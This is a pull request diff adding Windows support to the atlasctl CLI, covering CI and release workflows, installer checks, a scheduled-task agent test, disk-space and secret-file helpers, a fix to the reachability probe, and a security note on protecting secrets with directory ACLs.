### PR TITLE
feat(windows): native Windows support — binary, installer, and supervised agent

### DIFF
--- a/.gitattributes
+++ b/.gitattributes
@@ -1,0 +1,19 @@
+# Line endings are content here, not formatting.
+#
+# The golden files are compared BYTE FOR BYTE against a freshly rendered
+# command. A Windows checkout with the default `core.autocrlf=true` rewrites
+# every LF to CRLF on the way out, so every golden reads one byte per line
+# longer than the string it is compared with — 210 lines, 210 bytes, and a
+# whole-suite failure that says "rendering changed" when nothing did.
+#
+# `text eol=lf` rather than `-text`: these are text and should still be
+# diffable and mergeable, they simply must land on disk the way they were
+# committed.
+* text=auto eol=lf
+
+# Genuinely binary; never touch these.
+*.png binary
+*.webp binary
+*.ico binary
+*.tar.xz binary
+*.zip binary

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -128,4 +128,11 @@ jobs:
     runs-on: ubuntu-24.04
     steps:
       - uses: actions/checkout@v7
-      - run: shellcheck scripts/*.sh
+      - run: shellcheck scripts/*.sh scripts/tests/*.sh
+      # install.sh is the most-executed thing this project ships and the only
+      # one that runs on a machine before any of our code is trusted. shellcheck
+      # says it parses; this says it DECIDES correctly — which target, whether a
+      # downloaded binary may be executed, and what to do about an agent that
+      # may or may not already be there.
+      - name: install.sh behaviour
+        run: bash scripts/tests/install-sh.test.sh

--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -256,6 +256,11 @@ jobs:
             runner: macos-14
           - target: x86_64-apple-darwin
             runner: macos-14
+          # x86_64 only. Windows-on-ARM exists, but Docker Desktop is what
+          # atlasctl drives and its ARM64 Windows story is not one we can
+          # test, so shipping a binary for it would be shipping a promise.
+          - target: x86_64-pc-windows-msvc
+            runner: windows-2022
     steps:
       - uses: actions/checkout@v7
         with:
@@ -277,6 +282,7 @@ jobs:
       # container, with no glibc version to match.
       - run: cargo build --release --locked -p atlasctl --target ${{ matrix.target }}
       - name: package
+        if: ${{ !contains(matrix.target, 'windows') }}
         run: |
           set -eu
           out="atlasctl-${{ matrix.target }}"
@@ -284,13 +290,31 @@ jobs:
           cp "target/${{ matrix.target }}/release/atlasctl" "dist/$out/"
           cp LICENSE README.md "dist/$out/" 2>/dev/null || true
           tar -C "dist/$out" -cJf "dist/${out}.tar.xz" .
+      # A zip, not a tar.xz. Windows has shipped `tar` since 1803, but nothing
+      # in the shell expands one by double-click, and `Expand-Archive` — the
+      # one command an install script can rely on being there — reads zip and
+      # nothing else.
+      - name: package (windows)
+        if: ${{ contains(matrix.target, 'windows') }}
+        shell: pwsh
+        run: |
+          $ErrorActionPreference = 'Stop'
+          $out = "atlasctl-${{ matrix.target }}"
+          New-Item -ItemType Directory -Force -Path "dist/$out" | Out-Null
+          Copy-Item "target/${{ matrix.target }}/release/atlasctl.exe" "dist/$out/"
+          foreach ($f in 'LICENSE', 'README.md') {
+            if (Test-Path $f) { Copy-Item $f "dist/$out/" }
+          }
+          Compress-Archive -Path "dist/$out/*" -DestinationPath "dist/$out.zip" -Force
       - uses: actions/attest-build-provenance@v2
         with:
-          subject-path: dist/atlasctl-${{ matrix.target }}.tar.xz
+          subject-path: dist/atlasctl-${{ matrix.target }}.*
       - uses: actions/upload-artifact@v4
         with:
           name: dist-${{ matrix.target }}
-          path: dist/*.tar.xz
+          path: |
+            dist/*.tar.xz
+            dist/*.zip
 
   github-release:
     name: publish release assets
@@ -307,10 +331,15 @@ jobs:
           merge-multiple: true
       - name: checksums
         working-directory: dist
-        run: sha256sum ./*.tar.xz | sed 's| \./| |' > SHA256SUMS
+        # Both extensions, one file: install.sh and install.ps1 each look up
+        # the archive they downloaded by name, so an omitted class of artifact
+        # fails as "refusing to install unverified binaries" rather than as a
+        # missing checksum.
+        run: sha256sum ./*.tar.xz ./*.zip | sed 's| \./| |' > SHA256SUMS
       # install.sh rides along on every release so a user can diff the script
       # the website served against the one attached to the release.
       - run: cp scripts/install.sh dist/install.sh
+      - run: cp scripts/install.ps1 dist/install.ps1
       - name: upload
         env:
           GH_TOKEN: ${{ github.token }}

--- a/.github/workflows/windows.yml
+++ b/.github/workflows/windows.yml
@@ -49,6 +49,13 @@ jobs:
           if ($errs) { $errs | ForEach-Object { Write-Host $_ }; exit 1 }
           Write-Host "install.ps1 parses"
 
+      # Parsing is not deciding. This drives the checksum gate — the decision
+      # standing between `irm | iex` and executing arbitrary bytes — and the
+      # version comparison that chooses between upgrading and skipping.
+      - name: install.ps1 behaviour
+        shell: pwsh
+        run: ./scripts/tests/install-ps1.test.ps1
+
       # The scheduled-task plan is the half no unit test can reach: whether
       # Task Scheduler ACCEPTS this XML, whether the task then reports Running,
       # and whether uninstall removes it. Every one of those has failed for a

--- a/.github/workflows/windows.yml
+++ b/.github/workflows/windows.yml
@@ -34,3 +34,65 @@ jobs:
         run: cargo clippy --workspace --all-targets -- -D warnings
       - name: cargo test
         run: cargo test --workspace
+
+      # A parse pass, not a run: the installer downloads a release, and there
+      # is no Windows release until this lands. A syntax error in a script
+      # served by `irm | iex` is the worst possible failure mode -- it fails
+      # halfway through, on the user's machine, with no way back.
+      - name: parse install.ps1
+        shell: pwsh
+        run: |
+          $ErrorActionPreference = 'Stop'
+          $errs = $null
+          [void][System.Management.Automation.Language.Parser]::ParseFile(
+            "scripts/install.ps1", [ref]$null, [ref]$errs)
+          if ($errs) { $errs | ForEach-Object { Write-Host $_ }; exit 1 }
+          Write-Host "install.ps1 parses"
+
+      # The scheduled-task plan is the half no unit test can reach: whether
+      # Task Scheduler ACCEPTS this XML, whether the task then reports Running,
+      # and whether uninstall removes it. Every one of those has failed for a
+      # reason a pure planner cannot see -- a rejected encoding, a quoting bug,
+      # a task that exists but whose process died.
+      - name: install, verify and remove the agent for real
+        shell: pwsh
+        run: |
+          $ErrorActionPreference = 'Stop'
+          cargo build --release -p atlasctl
+          $exe = "target/release/atlasctl.exe"
+
+          & $exe agent install --no-discovery
+          if ($LASTEXITCODE -ne 0) { throw "agent install failed" }
+
+          $task = Get-ScheduledTask -TaskName 'atlasctl-agent' -ErrorAction Stop
+          Write-Host "task state: $($task.State)"
+
+          # The install claims it started; prove the port is actually open
+          # rather than trusting the claim. This is the exact failure the
+          # `verify` step exists for.
+          $up = $false
+          foreach ($i in 1..30) {
+            if (Get-NetTCPConnection -LocalPort 34333 -State Listen -ErrorAction SilentlyContinue) {
+              $up = $true; break
+            }
+            Start-Sleep -Seconds 1
+          }
+          if (-not $up) {
+            $log = "$env:LOCALAPPDATA\atlasctl\atlasctl-agent.log"
+            if (Test-Path $log) { Write-Host "--- agent log ---"; Get-Content $log }
+            else { Write-Host "no log at $log" }
+            throw "the agent never listened on 34333"
+          }
+          Write-Host "the agent is listening"
+
+          # Installing twice is the reported failure on macOS and the reason
+          # pre_activate exists. It must be an upgrade, not an error.
+          & $exe agent install --no-discovery
+          if ($LASTEXITCODE -ne 0) { throw "re-install must upgrade in place, not fail" }
+
+          & $exe agent uninstall
+          if ($LASTEXITCODE -ne 0) { throw "agent uninstall failed" }
+          if (Get-ScheduledTask -TaskName 'atlasctl-agent' -ErrorAction SilentlyContinue) {
+            throw "uninstall left the task behind"
+          }
+          Write-Host "install / re-install / uninstall all clean"

--- a/.github/workflows/windows.yml
+++ b/.github/workflows/windows.yml
@@ -86,9 +86,27 @@ jobs:
           Write-Host "the agent is listening"
 
           # Installing twice is the reported failure on macOS and the reason
-          # pre_activate exists. It must be an upgrade, not an error.
-          & $exe agent install --no-discovery
+          # pre_activate exists. It must be an upgrade, not an error -- and
+          # `agent install` returns 0 for "installed but not running" ON
+          # PURPOSE, so an exit-code check alone passes while the operator is
+          # told their agent is down. It was: the first run of this step
+          # printed "agent installed, but it is NOT running" and went green.
+          # The outcome, not the exit code, is what has to hold.
+          $out = & $exe agent install --no-discovery 2>&1 | Out-String
+          Write-Host $out
           if ($LASTEXITCODE -ne 0) { throw "re-install must upgrade in place, not fail" }
+          if ($out -match 'NOT running') {
+            throw "an upgrade reported the agent as down: $out"
+          }
+          $back = $false
+          foreach ($i in 1..30) {
+            if (Get-NetTCPConnection -LocalPort 34333 -State Listen -ErrorAction SilentlyContinue) {
+              $back = $true; break
+            }
+            Start-Sleep -Seconds 1
+          }
+          if (-not $back) { throw "the agent did not come back after an upgrade" }
+          Write-Host "the upgrade left a listening agent behind"
 
           & $exe agent uninstall
           if ($LASTEXITCODE -ne 0) { throw "agent uninstall failed" }

--- a/.github/workflows/windows.yml
+++ b/.github/workflows/windows.yml
@@ -1,0 +1,36 @@
+# SPDX-License-Identifier: AGPL-3.0-only
+#
+# Windows is a supported target, so it needs a compiler that says so. Nothing
+# else in CI runs on Windows, and a unix-only API compiles perfectly well on
+# Linux right up to the moment someone asks for a Windows binary.
+name: windows
+
+on:
+  push:
+    branches: [main]
+  pull_request:
+  workflow_dispatch:
+
+concurrency:
+  group: windows-${{ github.ref }}
+  cancel-in-progress: true
+
+jobs:
+  check:
+    runs-on: windows-latest
+    timeout-minutes: 45
+    steps:
+      - uses: actions/checkout@v4
+      - uses: dtolnay/rust-toolchain@stable
+        with:
+          components: clippy
+      - uses: Swatinem/rust-cache@v2
+      # `check` before `test`: the first port of a unix-only codebase fails to
+      # compile long before it fails a test, and a compile error list is the
+      # thing worth reading.
+      - name: cargo check
+        run: cargo check --workspace --all-targets
+      - name: cargo clippy
+        run: cargo clippy --workspace --all-targets -- -D warnings
+      - name: cargo test
+        run: cargo test --workspace

--- a/.github/workflows/windows.yml
+++ b/.github/workflows/windows.yml
@@ -108,6 +108,15 @@ jobs:
           if (-not $back) { throw "the agent did not come back after an upgrade" }
           Write-Host "the upgrade left a listening agent behind"
 
+          # The log is the entire reason `--log-file` exists. An empty or
+          # missing one means the redirect silently did nothing, and the
+          # install's "see why with Get-Content" advice names a file that
+          # never appears.
+          $log = "$env:LOCALAPPDATA\atlasctl\atlasctl-agent.log"
+          if (-not (Test-Path $log)) { throw "no agent log at $log" }
+          if ((Get-Item $log).Length -eq 0) { throw "the agent log at $log is empty" }
+          Write-Host "--- agent log ---"; Get-Content $log -Tail 20
+
           & $exe agent uninstall
           if ($LASTEXITCODE -ne 0) { throw "agent uninstall failed" }
           if (Get-ScheduledTask -TaskName 'atlasctl-agent' -ErrorAction SilentlyContinue) {

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -155,12 +155,14 @@ dependencies = [
  "anyhow",
  "atlas-recipes-data",
  "atlasctl-protocol",
+ "libc",
  "rustix",
  "serde",
  "serde_json",
  "serde_yaml_ng",
  "sha2 0.11.0",
  "thiserror",
+ "windows-sys 0.59.0",
 ]
 
 [[package]]

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -144,6 +144,7 @@ dependencies = [
  "thiserror",
  "tokio",
  "tokio-rustls",
+ "windows-sys 0.59.0",
  "zeroize",
 ]
 
@@ -154,6 +155,7 @@ dependencies = [
  "anyhow",
  "atlas-recipes-data",
  "atlasctl-protocol",
+ "rustix",
  "serde",
  "serde_json",
  "serde_yaml_ng",
@@ -1673,6 +1675,15 @@ name = "windows-sys"
 version = "0.52.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "282be5f36a8ce781fad8c8ae18fa3f9beff57ec1b52cb3de0789201425d9a33d"
+dependencies = [
+ "windows-targets",
+]
+
+[[package]]
+name = "windows-sys"
+version = "0.59.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1e38bc4d79ed67fd075bcc251a1c39b32a1776bbe92e5bef1f0bf1f8c531853b"
 dependencies = [
  "windows-targets",
 ]

--- a/SECURITY.md
+++ b/SECURITY.md
@@ -64,6 +64,23 @@ A remote registry you add can name any container image. It runs under the same
 unprivileged profile as everything else, but an image you do not trust is code
 you do not trust. Add registries you would accept code from.
 
+**On Windows, the secrets are protected by a directory, not by a mode.**
+`browser.token` and `agent.key` live under `%LOCALAPPDATA%\atlasctl`, whose
+inherited ACL grants the owning user, SYSTEM and Administrators — the same
+trust boundary as `~/.config` at `0700`, where root reads everything too. There
+is no mode bit to set and no equivalent of the unix check that a token has not
+been widened, so what atlasctl verifies instead is *containment*: a secret must
+live inside your user profile, and one destined elsewhere is refused before the
+bytes are written. That is a weaker statement than the unix check and is not
+presented as an equivalent one. If you point `--config-dir` at a network share
+or a directory you have widened yourself, atlasctl will refuse the share and
+cannot detect the second case.
+
+`%LOCALAPPDATA%` and not `%APPDATA%` is deliberate: `%APPDATA%` roams between
+machines on a domain, and `agent.key` is *this machine's* identity. Roaming it
+would give two machines one node identity, which is sharing a private key by
+copying a directory.
+
 ## Reproducing the parity claim
 
 Serve commands are byte-identical to the reference implementation's across the

--- a/crates/atlasctl-agent/Cargo.toml
+++ b/crates/atlasctl-agent/Cargo.toml
@@ -30,7 +30,6 @@ tokio-rustls = { version = "0.26", default-features = false, features = ["ring",
 rcgen = { version = "0.14", default-features = false, features = ["pem", "crypto", "ring"] }
 spake2 = "0.4"
 rustls-pki-types = "1.15.1"
-libc = "0.2"
 
 [dev-dependencies]
 # The recording mocks are feature-gated so they never ship in a release build.
@@ -41,3 +40,13 @@ test-mocks = []
 
 [lints]
 workspace = true
+
+[target.'cfg(unix)'.dependencies]
+libc = "0.2"
+
+[target.'cfg(windows)'.dependencies]
+windows-sys = { version = "0.59", features = [
+  "Win32_Foundation",
+  "Win32_Storage_FileSystem",
+  "Win32_System_SystemInformation",
+] }

--- a/crates/atlasctl-agent/src/discovery.rs
+++ b/crates/atlasctl-agent/src/discovery.rs
@@ -186,7 +186,8 @@ impl DiscoveryBrowser for NoDiscovery {
 /// because a node is its key.
 #[must_use]
 pub fn local_display_name() -> DisplayName {
-    DisplayName::new(&atlasctl_core::platform::hostname())
+    // Reads as a name, because it is shown as one in a node list.
+    DisplayName::new(&atlasctl_core::platform::hostname_or("atlas-node"))
 }
 
 /// This machine's operating system, coarsely, for display.

--- a/crates/atlasctl-agent/src/discovery.rs
+++ b/crates/atlasctl-agent/src/discovery.rs
@@ -186,10 +186,7 @@ impl DiscoveryBrowser for NoDiscovery {
 /// because a node is its key.
 #[must_use]
 pub fn local_display_name() -> DisplayName {
-    let raw = std::fs::read_to_string("/proc/sys/kernel/hostname")
-        .or_else(|_| std::env::var("HOSTNAME").map_err(std::io::Error::other))
-        .unwrap_or_else(|_| "atlas-node".to_owned());
-    DisplayName::new(&raw)
+    DisplayName::new(&atlasctl_core::platform::hostname())
 }
 
 /// This machine's operating system, coarsely, for display.

--- a/crates/atlasctl-agent/src/fleet/vitals.rs
+++ b/crates/atlasctl-agent/src/fleet/vitals.rs
@@ -174,7 +174,47 @@ fn free_bytes(path: &std::path::Path) -> Option<f64> {
         )]
         Some(stat.f_bavail as f64 * stat.f_frsize as f64)
     }
-    #[cfg(not(unix))]
+    #[cfg(windows)]
+    {
+        use std::os::windows::ffi::OsStrExt;
+        use windows_sys::Win32::Storage::FileSystem::GetDiskFreeSpaceExW;
+        // Same walk as the unix arm and for the same reason: the cache
+        // directory may not exist yet, and what matters is the volume that
+        // would hold it.
+        let mut probe = path;
+        while !probe.exists() {
+            probe = probe.parent()?;
+        }
+        let wide: Vec<u16> = probe
+            .as_os_str()
+            .encode_wide()
+            .chain(std::iter::once(0))
+            .collect();
+        let mut avail: u64 = 0;
+        // SAFETY: `wide` is NUL-terminated and outlives the call; `avail` is
+        // written only by it and read only after it reports success. The two
+        // total-size outputs are not wanted, and NULL is documented as the way
+        // to decline them.
+        let ok = unsafe {
+            GetDiskFreeSpaceExW(
+                wide.as_ptr(),
+                &raw mut avail,
+                std::ptr::null_mut(),
+                std::ptr::null_mut(),
+            )
+        };
+        if ok == 0 {
+            return None;
+        }
+        #[expect(
+            clippy::cast_precision_loss,
+            reason = "free space is displayed in gigabytes"
+        )]
+        // Available to THIS user, not the volume total: a per-user quota is
+        // the number that decides whether a pull fits.
+        Some(avail as f64)
+    }
+    #[cfg(not(any(unix, windows)))]
     {
         let _ = path;
         None

--- a/crates/atlasctl-agent/src/fleet/vitals.rs
+++ b/crates/atlasctl-agent/src/fleet/vitals.rs
@@ -111,7 +111,12 @@ impl VitalsSource for SystemVitals {
         // than the client's: an idle part at a low clock is normal, the same
         // clock under load is the failure that hides for weeks.
         let device = crate::telemetry::sample_device(self.runner.as_ref(), &self.caps, false);
-        let disk = free_bytes(&self.disk_path);
+        // f64 because it crosses the wire as JSON, where there is no u64.
+        #[expect(
+            clippy::cast_precision_loss,
+            reason = "free space is displayed in gigabytes"
+        )]
+        let disk = atlasctl_core::platform::free_bytes(&self.disk_path).map(|b| b as f64);
         let docker_ok = self
             .runner
             .run(&docker_probe_argv())
@@ -141,84 +146,6 @@ pub fn docker_probe_argv() -> Vec<String> {
         "--format".to_owned(),
         "{{.ServerVersion}}".to_owned(),
     ]
-}
-
-/// Free bytes on the filesystem holding `path`, when it can be determined.
-///
-/// A full model cache is a leading cause of launch failure, so this is worth
-/// reporting even though it needs a platform call.
-fn free_bytes(path: &std::path::Path) -> Option<f64> {
-    #[cfg(unix)]
-    {
-        use std::os::unix::ffi::OsStrExt;
-        // The cache directory may not exist yet on a fresh install, and statvfs
-        // on a missing path fails. What matters is the filesystem that WOULD
-        // hold it, so walk up to the nearest ancestor that does exist.
-        let mut probe = path;
-        while !probe.exists() {
-            match probe.parent() {
-                Some(parent) => probe = parent,
-                None => return None,
-            }
-        }
-        let c = std::ffi::CString::new(probe.as_os_str().as_bytes()).ok()?;
-        // SAFETY: `c` is a valid NUL-terminated path and `stat` is written only
-        // by the call, which reports success before we read it.
-        let mut stat: libc::statvfs = unsafe { std::mem::zeroed() };
-        if unsafe { libc::statvfs(c.as_ptr(), &raw mut stat) } != 0 {
-            return None;
-        }
-        #[expect(
-            clippy::cast_precision_loss,
-            reason = "free space is displayed in gigabytes"
-        )]
-        Some(stat.f_bavail as f64 * stat.f_frsize as f64)
-    }
-    #[cfg(windows)]
-    {
-        use std::os::windows::ffi::OsStrExt;
-        use windows_sys::Win32::Storage::FileSystem::GetDiskFreeSpaceExW;
-        // Same walk as the unix arm and for the same reason: the cache
-        // directory may not exist yet, and what matters is the volume that
-        // would hold it.
-        let mut probe = path;
-        while !probe.exists() {
-            probe = probe.parent()?;
-        }
-        let wide: Vec<u16> = probe
-            .as_os_str()
-            .encode_wide()
-            .chain(std::iter::once(0))
-            .collect();
-        let mut avail: u64 = 0;
-        // SAFETY: `wide` is NUL-terminated and outlives the call; `avail` is
-        // written only by it and read only after it reports success. The two
-        // total-size outputs are not wanted, and NULL is documented as the way
-        // to decline them.
-        let ok = unsafe {
-            GetDiskFreeSpaceExW(
-                wide.as_ptr(),
-                &raw mut avail,
-                std::ptr::null_mut(),
-                std::ptr::null_mut(),
-            )
-        };
-        if ok == 0 {
-            return None;
-        }
-        #[expect(
-            clippy::cast_precision_loss,
-            reason = "free space is displayed in gigabytes"
-        )]
-        // Available to THIS user, not the volume total: a per-user quota is
-        // the number that decides whether a pull fits.
-        Some(avail as f64)
-    }
-    #[cfg(not(any(unix, windows)))]
-    {
-        let _ = path;
-        None
-    }
 }
 
 /// What this machine is currently serving.

--- a/crates/atlasctl-agent/src/identity.rs
+++ b/crates/atlasctl-agent/src/identity.rs
@@ -32,10 +32,6 @@ const KEY_FILE: &str = "agent.key";
 /// Filename of the pin store.
 const PINS_FILE: &str = "peers.json";
 
-/// Permissions the key and pin files must carry.
-#[cfg(unix)]
-const PRIVATE_MODE: u32 = 0o600;
-
 /// The fingerprint of a public key.
 #[must_use]
 pub fn fingerprint(public: &VerifyingKey) -> NodeId {
@@ -104,7 +100,7 @@ impl Identity {
             return Ok(Self { signing, id });
         }
         let me = Self::generate();
-        write_private(&path, me.signing.as_bytes())?;
+        atlasctl_core::secretfile::write(&path, me.signing.as_bytes())?;
         Ok(me)
     }
 
@@ -131,32 +127,6 @@ impl Identity {
     pub const fn signing_key(&self) -> &SigningKey {
         &self.signing
     }
-}
-
-/// Write a file that only its owner may read.
-///
-/// The mode is set before the bytes are written, so there is no window in
-/// which a key exists at the default umask.
-fn write_private(path: &Path, bytes: &[u8]) -> Result<()> {
-    #[cfg(unix)]
-    {
-        use std::io::Write;
-        use std::os::unix::fs::OpenOptionsExt;
-        let mut f = std::fs::OpenOptions::new()
-            .write(true)
-            .create(true)
-            .truncate(true)
-            .mode(PRIVATE_MODE)
-            .open(path)
-            .with_context(|| format!("creating {}", path.display()))?;
-        f.write_all(bytes)
-            .with_context(|| format!("writing {}", path.display()))?;
-    }
-    #[cfg(not(unix))]
-    {
-        std::fs::write(path, bytes).with_context(|| format!("writing {}", path.display()))?;
-    }
-    Ok(())
 }
 
 /// One peer this machine has paired with.
@@ -284,7 +254,7 @@ impl PinStore {
     fn save(&self, pins: &BTreeMap<NodeId, Pin>) -> Result<()> {
         let list: Vec<&Pin> = pins.values().collect();
         let json = serde_json::to_string_pretty(&list).context("serialising pins")?;
-        write_private(&self.path, json.as_bytes())
+        atlasctl_core::secretfile::write(&self.path, json.as_bytes())
     }
 }
 

--- a/crates/atlasctl-agent/src/identity/tests.rs
+++ b/crates/atlasctl-agent/src/identity/tests.rs
@@ -51,6 +51,9 @@ fn the_id_really_is_the_fingerprint_of_the_public_key() {
     assert_eq!(me.id(), fingerprint(&me.public()));
 }
 
+/// The unix half of the guarantee, stated as bits. The cross-platform half —
+/// that what `secretfile::write` produces `secretfile::verify` accepts — lives
+/// with the implementation.
 #[cfg(unix)]
 #[test]
 fn the_private_key_is_not_world_readable() {
@@ -62,7 +65,7 @@ fn the_private_key_is_not_world_readable() {
         .permissions()
         .mode()
         & 0o777;
-    assert_eq!(mode, PRIVATE_MODE, "a private key must be 0600");
+    assert_eq!(mode, 0o600, "a private key must be 0600");
 }
 
 #[test]
@@ -123,7 +126,7 @@ fn the_pin_store_is_not_world_readable_either() {
         .permissions()
         .mode()
         & 0o777;
-    assert_eq!(mode, PRIVATE_MODE);
+    assert_eq!(mode, 0o600);
 }
 
 #[test]

--- a/crates/atlasctl-agent/src/launcher/docker/tests.rs
+++ b/crates/atlasctl-agent/src/launcher/docker/tests.rs
@@ -2,14 +2,17 @@
 
 use super::*;
 use atlasctl_core::docker::profile::{NvidiaDevices, ROOTLESS_V1};
+use atlasctl_core::host::PosixUser;
 use atlasctl_core::io::RecordingRunner;
 use atlasctl_core::io::process::Output;
 use atlasctl_core::recipe::Provenance;
 
 fn host() -> HostSnapshot {
     HostSnapshot {
-        uid: 1000,
-        gid: 1000,
+        posix_user: Some(PosixUser {
+            uid: 1000,
+            gid: 1000,
+        }),
         home: "/home/spark".into(),
         hf_cache_dir: "/home/spark/.cache/huggingface".into(),
         env: BTreeMap::new(),

--- a/crates/atlasctl-agent/src/rendezvous.rs
+++ b/crates/atlasctl-agent/src/rendezvous.rs
@@ -323,27 +323,29 @@ mod tests {
         /// the one that separates it from a link going nowhere.
         #[test]
         fn a_refused_connection_counts_as_reachable() {
-            // A port this process just released, rather than a low fixed one:
-            // port 1 is not merely unbound on some hosts, it is filtered, and a
-            // filtered port answers with silence rather than a refusal — so the
-            // test would be asserting the opposite of what it reads.
-            let port = {
-                let l = std::net::TcpListener::bind("127.0.0.1:0").expect("bind");
-                l.local_addr().expect("addr").port()
-            };
-            // Reported with the error the probe actually saw. "assertion failed:
-            // answers(...)" names neither the port nor why, which is the whole
-            // question when this fails on a platform nobody is sitting at.
-            let observed = std::net::TcpStream::connect_timeout(
-                &SocketAddr::new("127.0.0.1".parse().expect("ip"), port),
-                PROBE_TIMEOUT,
-            )
-            .err()
-            .map(|e| e.kind());
+            // The port number is reserved with a UDP socket, and TCP is probed
+            // on it. Two wrong ways to pick this port were tried first: a low
+            // fixed one (port 1 is filtered on some hosts, and a filtered port
+            // answers with silence, not a refusal), and a TCP port this process
+            // had just released — which leaves TCP TIME_WAIT behind, and a
+            // socket in TIME_WAIT drops the SYN instead of resetting it. A UDP
+            // reservation has neither problem: nothing has ever listened on
+            // that TCP port, so the stack refuses immediately.
+            let udp = std::net::UdpSocket::bind("127.0.0.1:0").expect("reserve a port");
+            let port = udp.local_addr().expect("addr").port();
+            let ip = "127.0.0.1".parse().expect("ip");
+            // Reported with what the probe actually saw. "assertion failed:
+            // answers(...)" names neither the port nor the reason, which is the
+            // whole question when this fails on a platform nobody is sitting at.
+            let via_timeout =
+                std::net::TcpStream::connect_timeout(&SocketAddr::new(ip, port), PROBE_TIMEOUT)
+                    .err()
+                    .map(|e| e.kind());
+            let via_probe = super::super::connect_outcome(SocketAddr::new(ip, port));
             assert!(
                 answers("127.0.0.1", port),
-                "a closed loopback port must read as reachable; \
-                 connecting to {port} gave {observed:?}"
+                "a closed loopback port must read as reachable; port {port} gave \
+                 connect_timeout={via_timeout:?} probe={via_probe:?}"
             );
         }
 

--- a/crates/atlasctl-agent/src/rendezvous.rs
+++ b/crates/atlasctl-agent/src/rendezvous.rs
@@ -114,7 +114,18 @@ pub fn answers(target: &str, port: u16) -> bool {
     };
     match TcpStream::connect_timeout(&SocketAddr::new(ip, port), PROBE_TIMEOUT) {
         Ok(_) => true,
-        Err(e) => e.kind() == std::io::ErrorKind::ConnectionRefused,
+        // A REFUSAL is an answer: something at that address processed the SYN
+        // and said no, which is exactly what a healthy peer does before rank 0
+        // binds the rendezvous port. A reset means the same thing and is what
+        // Windows returns down some paths for the same closed port.
+        //
+        // What does NOT count is silence — a timeout, or the stack telling us
+        // it has no route. Those are the link-going-nowhere cases this probe
+        // exists to separate out.
+        Err(e) => matches!(
+            e.kind(),
+            std::io::ErrorKind::ConnectionRefused | std::io::ErrorKind::ConnectionReset
+        ),
     }
 }
 
@@ -278,8 +289,28 @@ mod tests {
         /// the one that separates it from a link going nowhere.
         #[test]
         fn a_refused_connection_counts_as_reachable() {
-            // Loopback with nothing bound refuses immediately.
-            assert!(answers("127.0.0.1", 1));
+            // A port this process just released, rather than a low fixed one:
+            // port 1 is not merely unbound on some hosts, it is filtered, and a
+            // filtered port answers with silence rather than a refusal — so the
+            // test would be asserting the opposite of what it reads.
+            let port = {
+                let l = std::net::TcpListener::bind("127.0.0.1:0").expect("bind");
+                l.local_addr().expect("addr").port()
+            };
+            // Reported with the error the probe actually saw. "assertion failed:
+            // answers(...)" names neither the port nor why, which is the whole
+            // question when this fails on a platform nobody is sitting at.
+            let observed = std::net::TcpStream::connect_timeout(
+                &SocketAddr::new("127.0.0.1".parse().expect("ip"), port),
+                PROBE_TIMEOUT,
+            )
+            .err()
+            .map(|e| e.kind());
+            assert!(
+                answers("127.0.0.1", port),
+                "a closed loopback port must read as reachable; \
+                 connecting to {port} gave {observed:?}"
+            );
         }
 
         #[test]

--- a/crates/atlasctl-agent/src/rendezvous.rs
+++ b/crates/atlasctl-agent/src/rendezvous.rs
@@ -112,21 +112,55 @@ pub fn answers(target: &str, port: u16) -> bool {
     let Ok(ip) = target.parse::<IpAddr>() else {
         return false;
     };
-    match TcpStream::connect_timeout(&SocketAddr::new(ip, port), PROBE_TIMEOUT) {
-        Ok(_) => true,
-        // A REFUSAL is an answer: something at that address processed the SYN
-        // and said no, which is exactly what a healthy peer does before rank 0
-        // binds the rendezvous port. A reset means the same thing and is what
-        // Windows returns down some paths for the same closed port.
-        //
-        // What does NOT count is silence — a timeout, or the stack telling us
-        // it has no route. Those are the link-going-nowhere cases this probe
-        // exists to separate out.
-        Err(e) => matches!(
-            e.kind(),
+    let addr = SocketAddr::new(ip, port);
+    connect_outcome(addr).is_some_and(is_an_answer)
+}
+
+/// A refusal is an ANSWER: something at that address processed the SYN and said
+/// no, which is exactly what a healthy peer does before rank 0 binds the
+/// rendezvous port. A reset means the same thing. Silence — a timeout, or the
+/// stack saying it has no route — is the link-going-nowhere case this probe
+/// exists to separate out.
+fn is_an_answer(outcome: Result<(), std::io::ErrorKind>) -> bool {
+    match outcome {
+        Ok(()) => true,
+        Err(k) => matches!(
+            k,
             std::io::ErrorKind::ConnectionRefused | std::io::ErrorKind::ConnectionReset
         ),
     }
+}
+
+/// Connect, giving up after [`PROBE_TIMEOUT`]. `None` means the window expired
+/// with no answer at all.
+#[cfg(not(windows))]
+fn connect_outcome(addr: SocketAddr) -> Option<Result<(), std::io::ErrorKind>> {
+    match TcpStream::connect_timeout(&addr, PROBE_TIMEOUT) {
+        Ok(_) => Some(Ok(())),
+        Err(e) if e.kind() == std::io::ErrorKind::TimedOut => None,
+        Err(e) => Some(Err(e.kind())),
+    }
+}
+
+/// The same, on Windows, where `connect_timeout` cannot express the answer.
+///
+/// It reports a REFUSED connection as `TimedOut` — measured, not assumed: a
+/// port this process had just released came back `Some(TimedOut)` on CI. The
+/// cause is that a failed non-blocking connect is signalled through `select`'s
+/// exception set, which that path does not consult, so every refusal is
+/// indistinguishable from silence and every healthy peer reads as unreachable.
+///
+/// A blocking connect on its own thread does report the refusal. The thread is
+/// abandoned rather than joined when the window expires; it ends by itself when
+/// the OS connect gives up, and a probe must not block the caller for the two
+/// minutes that can take.
+#[cfg(windows)]
+fn connect_outcome(addr: SocketAddr) -> Option<Result<(), std::io::ErrorKind>> {
+    let (tx, rx) = std::sync::mpsc::channel();
+    std::thread::spawn(move || {
+        let _ = tx.send(TcpStream::connect(addr).map(|_| ()).map_err(|e| e.kind()));
+    });
+    rx.recv_timeout(PROBE_TIMEOUT).ok()
 }
 
 /// The best address among `candidates` that this machine can actually reach.
@@ -311,6 +345,23 @@ mod tests {
                 "a closed loopback port must read as reachable; \
                  connecting to {port} gave {observed:?}"
             );
+        }
+
+        /// The classification, without a socket. `answers` needs a real port
+        /// to exercise, so this pins the RULE on its own: which outcomes mean
+        /// "the host is there" and which mean "nothing is".
+        #[test]
+        fn silence_is_not_an_answer_but_a_refusal_is() {
+            use std::io::ErrorKind as E;
+            assert!(super::super::is_an_answer(Ok(())));
+            assert!(super::super::is_an_answer(Err(E::ConnectionRefused)));
